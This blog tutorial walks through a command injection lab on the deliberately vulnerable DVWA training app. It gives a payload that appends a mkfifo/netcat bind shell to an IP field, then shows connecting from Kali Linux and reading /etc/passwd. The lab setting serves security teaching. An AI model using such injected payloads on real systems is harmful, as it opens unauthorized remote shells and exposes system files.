Thursday, 26 March 2020

Damn Vulnerable Web App (DVWA) | Command Injection Attack using NetCat

In this post we are going to cover Command Injection Attack using NetCat on Damn Vulnerable Web App.

Background:
  • What is Damn Vulnerable Web App (DVWA)?
    • Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
    • Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
  • What is Command Execution?
    • Command Execution is where a website application provides the ability to execute system commands.
  • What is a Command Injection Attack?
    • The purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable application.
    • In situations like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it
      as an authorized system user.
    • Note, the commands are executed with the same privileges as the application and/or web server.
    • Command injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker (forms, cookies, HTTP headers etc.).
  • What is a Command Injection Listener Attack?
    • A Command Injection Listener Attack is where a malicious user creates a backdoor listener using common network utilities such as netcat.
    • Netcat is a computer networking service for reading from and writing to network connections using TCP or UDP.
      • Unix/Linux Example: 9.9.9.9;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
Lab:
1) Access DVWA application on your browser.

2) Click on Command Injection

3) Pass below data as argument in text box and lick on submit. 
192.168.43.118;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
  • Make a FIFO named pipe.
  • Pipes allow separate processes to communicate without having been designed explicitly to work together.
  • This will allow two processes to connect to netcat.
  • nc -l 4444, tells netcat to listen and allow connections on port 4444.
  • 192.168.43.118 is IP address of DVWA applciation.
4) Point 3 will open a back door to access DVWA machine. 

5) Now Login to your Kali Linux machine.

6) Now Use NetCat on Kali Linux to access DVWA instance.
  1. nc 192.168.43.209 4444
    • Use Kali Linux to Connect to DVWA Netcat session on port 4444
  2. hostname
    • This is server hostname that hosts DVWA.
  3. cat /etc/passwd
    • Show content of the /etc/passwd file


Like this we can perform any operation on DVWA instance from Kali Linux as long as we have NetCat session running on DVWA machine.